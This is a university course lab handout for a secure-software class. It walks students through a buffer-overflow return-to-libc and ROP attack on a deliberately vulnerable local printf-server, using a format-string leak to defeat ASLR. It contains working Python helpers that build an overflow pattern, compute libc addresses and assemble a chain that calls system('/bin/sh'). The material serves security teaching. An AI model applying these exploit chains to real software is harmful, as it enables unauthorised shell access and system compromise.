University of Minnesota
Development of Secure Software Systems

CSci 4271 Lab 14a

In this week's lab you'll pretend to be an attacker one last time. We haven't gone into much depth in this course about defenses and counter-attack techniques, but this lab goes one step further than previous labs and projects (you might say it removes a simplification) by letting you create a more sophisticated attack that works even in the presence of W xor X and ASLR.

These instructions are written under the assumption you're using one of the CSE Labs Ubuntu 22.04 machines like the 1-262 lab machines. Because the lab is about low-level attacks, differences in how the victim program is compiled will affect what attacks are possible. For instance, if you want to work on the lab remotely, you're better off using Vole-FX3 than the old 20.04-based Vole. (An older version of the lab was based on 20.04, but we haven't rechecked this version there.)

Reconnaissance of the victim

The victim program for this week's attack is a simple server named printf-server; as the name suggests, it provides the service of formatting integers using the C library printf function. You can copy and compile your own version like this:

cp /web/classes/Spring-2024/csci4271/labs/14a/printf-server.c .
gcc-11 -Og -no-pie -fno-stack-protector -Wall -g printf-server.c -o printf-server

The option -fno-stack-protector disables stack canaries; we've disabled that defense because today's attack is still based on overwriting a return address. -Og is a modest optimization level that uses registers and removes unused code. (Compared to some other victim programs that we compiled without any optimization, we had to add some extra code in this program to make sure the vulnerable operations were compiled in the way we wanted and not optimized away.)

Take a moment to look over the source code for the program and try giving it some benign commands. Each command is a single line starting with a capital letter. The most important commands for the basic functionality are F to set a printf format, N to set a number, and P to print it.

The command O has a buffer overflow. If you give a long line starting with O, the program will crash. As we did for previous programs vulnerable to a buffer overflow, use commands inside GDB to figure out where the return address of the overflow function is stored relative to the overflowed buffer buf.
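
One possible way to find that distance, offered as a sketch and not as the required method, is to send a line made of distinct 8-byte chunks and see which chunk lands in the return address slot. The helper names pattern and offset_of are hypothetical, and the sketch assumes the bytes after the O are copied into buf unchanged.

```python
import struct
import sys

CHUNK = 8  # one saved return address is 8 bytes on x86-64


def pattern(n_chunks):
    """Return n_chunks distinct printable 8-byte chunks, e.g. b'<000000>'."""
    return b"".join(b"<%06d>" % i for i in range(n_chunks))


def offset_of(value):
    """Given the 64-bit value GDB shows for the overwritten return address,
    return the byte offset of that chunk from the start of pattern()."""
    chunk = struct.pack("<Q", value)    # undo the little-endian load
    index = int(chunk[1:7].decode())    # the digits between '<' and '>'
    return index * CHUNK


if __name__ == "__main__":
    # Command letter, pattern, newline; 32 chunks is an arbitrary guess.
    sys.stdout.buffer.write(b"O" + pattern(32) + b"\n")
```

If the program stops at the ret instruction of overflow, x/gx $rsp in GDB shows the chunk that replaced the return address, and offset_of converts that value to a distance from the first pattern byte. Adjust the result if the command letter itself is also stored in buf.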

As you might have guessed from the printf functionality, this program also has a format string vulnerability. But for the purposes of this lab, we're only going to use it for information disclosure, not with %n.

Recall that Linux C binaries are usually dynamically linked with a system library, conventionally called the C library or libc, which implements standard library functions, system call wrappers, and some other commonly used functions. You will need to work more closely with this library today. The ldd command lists the shared libraries that a program dynamically links with; for each one it prints the full path to the library and its base address. You can then use commands like objdump or nm on the library file.

ldd ./printf-server
objdump -d /lib/x86_64-linux-gnu/libc.so.6 | less

Non-ASLR return-to-libc attack

For the first step of attack development, we'll build an attack that works when ASLR is disabled. So for this part of the lab use setarch -R when you run the victim or for your whole shell.

Because the W xor X protection is enabled, we can't inject any shellcode in this program: we need to achieve the attacker's functionality using code already in the program's address space. Specifically we suggest today you do what's called a return-to-libc attack, a simple version of ROP where you call an entire function from the standard library. In particular we'll take the classic choice of system as the library function to call, since it already has the functionality of starting an external program. Also classically a convenient program for an attack to start is a shell, and the library includes a string containing the path to the standard shell /bin/sh, since it's already part of the implementation of system. So the functionality we're injecting is going to be like the C code:

system("/bin/sh"); exit(anything);

The call to exit isn't actually needed for the attack, but it's convenient to terminate the attack so you can distinguish between things going wrong before the attack and after. We don't care about the value of the argument to exit, but we do care about the argument to system.

The pieces of code and data we need for the attack are all kept in the library that is called libc on Unix systems. Even though we have randomization turned off for now, the OS still loads the library at an address of the OS's choosing, so you'll need to keep in mind how the addresses are changed based on where the library is loaded; once we turn on ASLR the locations will also be different every time the program runs.

As a preliminary step, try making a return-to-libc attack that just calls exit, which is particularly easy because you don't have to set up the argument. Basically your overflow just needs to overwrite the return address of overflow to be the entry point of exit. To see how the address mapping happens, try two ways of finding the location of exit. First, run the server under GDB, and after the program is running and stopped at a breakpoint, look at the results of p exit. Second, look at the output of these commands (based on the C library location we found earlier):

ldd ./printf-server
nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep ' exit'

The nm command prints symbol table information about an executable or library (here with -D to look at the dynamic symbols of a shared library). Because shared libraries are designed from the beginning to be loaded at different addresses, what's stored in the binary and printed by nm is just a relative address. You should be able to see that the sum of the two numbers, the library's base address from ldd and the relative address from nm, matches the address you saw from GDB.
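
The addition can be sketched in a few lines of Python. The function names and the two example lines are hypothetical placeholders that only imitate the shape of ldd and nm -D output; substitute what your own machine prints.

```python
import re


def ldd_base(ldd_line):
    """Extract the load address from an ldd line, the hex number in parentheses."""
    match = re.search(r"\((0x[0-9a-fA-F]+)\)", ldd_line)
    if match is None:
        raise ValueError("no load address in ldd line")
    return int(match.group(1), 16)


def nm_offset(nm_line):
    """Extract the relative address, the first field of an nm -D line."""
    return int(nm_line.split()[0], 16)


# Placeholder values for illustration only, not real addresses.
EXAMPLE_LDD = "libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7c00000)"
EXAMPLE_NM = "0000000000012340 T exit@@GLIBC_2.2.5"

if __name__ == "__main__":
    runtime_address = ldd_base(EXAMPLE_LDD) + nm_offset(EXAMPLE_NM)
    print(hex(runtime_address))  # compare with GDB's "p exit"
```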

Verify that you can overflow the buffer and cause exit to be executed. Note that if exit runs correctly, the program will stop without crashing or printing anything.

Adding a bit of ROP

The classic version of return-to-libc also put the arguments to the library function in the stack overflow, because that was the calling convention for Linux/x86-32. For our attack against a 64-bit binary, that won't work because the argument to system needs to be supplied in the register %rdi. So for this part of the attack we need a very simple version of the idea of a gadget from ROP: code that loads a value from the stack into %rdi and then returns. That will be the first "function" that the attack returns to, and when it returns, execution continues with the other return addresses on the stack. As the easiest version of this task, you'll see there's a function named useful_gadget in the victim program that is useful for this purpose. If you're feeling more ambitious, this gadget also exists in the C library, though there's an extra trick needed to find it there.

The two other obvious pieces you need in your attack are the address of the system function and the address of a copy of the string /bin/sh. You can find the address of system just like we did for exit before. The strings program can be used to find printable strings in a binary. In particular, try this command:

strings -tx -a /lib/x86_64-linux-gnu/libc.so.6 | fgrep /bin/sh

One other trick you'll need is related to the fact that some x86-64 code depends on the stack pointer being 16-byte aligned, and not just 8-byte aligned. Some library functions will crash if you call them with the stack pointer at an odd multiple of 8. To fix this you can just pad your return-oriented program with the address of a gadget that doesn't do anything at all, and just returns right away. This kind of gadget is even easier to find.
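
As a rough sketch of how the pieces above could be laid out, the Python below builds the sequence of 8-byte words that starts at the overwritten return address. The names p64 and build_chain are hypothetical, every address is something you must find yourself, and the sketch assumes the %rdi gadget is a single pop followed by ret.

```python
import struct


def p64(value):
    """Pack an address as 8 little-endian bytes, as x86-64 stores it."""
    return struct.pack("<Q", value)


def build_chain(pop_rdi, ret, binsh, system, exit_fn, align=True):
    """Return the bytes that replace the return address and what follows it.

    pop_rdi: address of a gadget that pops the stack into %rdi and returns
    ret:     address of a lone ret instruction, used only as padding
    """
    words = []
    if align:
        words.append(ret)    # moves the stack pointer by 8, does nothing else
    words += [
        pop_rdi, binsh,      # %rdi = address of the "/bin/sh" string
        system,              # system("/bin/sh")
        exit_fn,             # exit with whatever value is left in %rdi
    ]
    return b"".join(p64(w) for w in words)
```

The align flag is there so you can try the chain with and without the padding word; which one system needs depends on where the chain lands in your build.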

Your full overflow is going to have a lot of binary data and null bytes in it, so it won't be convenient to type it in on the terminal. You'll want to do something like using a scripting language with a pack command, or write the attack in a hex editor. Even though it's binary data, printf-server still terminates each command with a newline, so be sure it ends with that. Also, after you've started a shell, you'll want to give it another command, but if you're redirecting the input from a file or a pipe you won't automatically get a prompt back. For a simple test you can just put the command you want to give to the shell after the command to printf-server, since printf-server doesn't read ahead. For instance, send xcalc and a newline to start a calculator.
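
A minimal sketch of that framing in Python follows. The name frame_attack and the numbers in the demo are hypothetical, and padding_len is assumed to be counted from the first byte after the O; adjust it if your measurements say otherwise.

```python
import sys


def frame_attack(padding_len, chain, shell_command=b"xcalc"):
    """Build the bytes to feed to printf-server on standard input."""
    body = b"A" * padding_len + chain
    if b"\n" in body:
        # A 0x0a byte inside the payload would end the command line early.
        raise ValueError("payload contains a newline byte")
    # The O command line, then the line that the new shell will read.
    return b"O" + body + b"\n" + shell_command + b"\n"


if __name__ == "__main__":
    # Placeholder values: 40 bytes of padding and a dummy one-word chain.
    dummy_chain = (0x401136).to_bytes(8, "little")
    sys.stdout.buffer.write(frame_attack(40, dummy_chain))
```

Redirecting the script's output to a file gives you something you can inspect in a hex editor and then supply to the server as its standard input.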

Bypassing ASLR

Now let's generalize the attack so that it works even in the presence of ASLR. All the libc-based addresses you're using will now change every time you run the victim, so you can't hard code them. But luckily because the program also has a format string vulnerability, you can get information that will let you figure out the library address from the program.

You may notice that the main function has a function pointer variable that is initialized to the location of the printf function in the C library. Use a format string with %lx to leak that value. Notice that even under ASLR, the starting address of the C library always ends in 0x000, which makes it easier to see which address is which.
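
Once you have a leaked value, the arithmetic to recover the library's location might look like the Python sketch below. The function names are hypothetical, and printf_offset stands for the relative address that nm -D reports for printf in your copy of the library.

```python
def libc_base_from_leak(leaked_hex, printf_offset):
    """Turn a %lx leak of printf's address into the library's load address."""
    leaked = int(leaked_hex.strip(), 16)
    base = leaked - printf_offset
    if base & 0xFFF != 0:
        # The base always ends in 0x000, so this value was not printf.
        raise ValueError("leak does not give a base ending in 0x000")
    return base


def rebase(base, offset):
    """Run-time address of a libc symbol or string at a given relative address."""
    return base + offset
```

The check on the low 12 bits is a cheap way to catch reading the wrong %lx field: a wrong value will almost never subtract down to an address ending in 0x000.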

You can first try doing the location-sensitive attack in a manual way by recomputing the addresses as needed; you may still need a small script or program to supply the attack at the right time. A more sophisticated approach is to embed your attack in a program of its own that interacts with the victim program. You can start from a template we've provided:

cp /web/classes/Spring-2024/csci4271/labs/14a/attack-template.c attack.c

The template already provides the code to start up the vulnerable server as a child process, and to send commands and receive data back from it. But you'll need to put the pieces together by implementing the function attack.